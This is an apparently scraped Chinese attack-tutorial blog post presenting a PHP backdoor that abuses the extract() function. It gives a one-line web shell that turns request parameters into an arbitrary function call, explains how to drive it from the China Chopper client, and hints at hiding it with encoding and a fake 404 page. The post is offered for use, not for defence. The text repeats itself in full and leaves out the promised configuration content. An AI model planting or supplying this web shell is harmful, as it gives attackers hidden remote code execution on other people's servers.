ODOR1–PHP extract 后门使用方法
62人参与 • 2016-08-22 • 脚本攻防
php extract 函数后门
auth:winger[l4f][cgh]
date: 2014-02-24
今天介绍的是一种新的php后门: extract 函数后门.
extract
(php 4, php 5)
extract — 从数组中将变量导入到当前的符号表
int extract ( array &$var_array [, int $extract_type = extr_overwrite [, string $prefix = null ]] )
本函数用来将变量从数组中导入到当前的符号表中.
具体应用:
1: php中extract函数各种用法介绍
2: php extract() 函数
3: 官方文档
4: php-backdoors-hidden-with-clever-use-of-extract-function
接下来操刀上马:)
服务端代码:
<?@extract($_request);@die($err($info));?>
菜刀使用附加数据提交功能,"编辑shell-->配置",填入下面的内容:
最后加上各种编码,标签和404....你懂得( ‵▽′)ψ
auth:winger[l4f][cgh]
date: 2014-02-24
今天介绍的是一种新的php后门: extract 函数后门.
复制代码
代码如下:extract
(php 4, php 5)
extract — 从数组中将变量导入到当前的符号表
int extract ( array &$var_array [, int $extract_type = extr_overwrite [, string $prefix = null ]] )
本函数用来将变量从数组中导入到当前的符号表中.
具体应用:
1: php中extract函数各种用法介绍
2: php extract() 函数
3: 官方文档
4: php-backdoors-hidden-with-clever-use-of-extract-function
接下来操刀上马:)
服务端代码:
复制代码
代码如下:<?@extract($_request);@die($err($info));?>
菜刀使用附加数据提交功能,"编辑shell-->配置",填入下面的内容:
最后加上各种编码,标签和404....你懂得( ‵▽′)ψ
赞 (0)
打赏
微信扫一扫
微信扫一扫
您想发表意见!!点此发布评论
![[PHP是世界上最好的语言] 不信你看这款PHP写的敲诈者木马](https://images.3wcode.com/3wcode/20240519/s_0_202405190555279680.png)
发表评论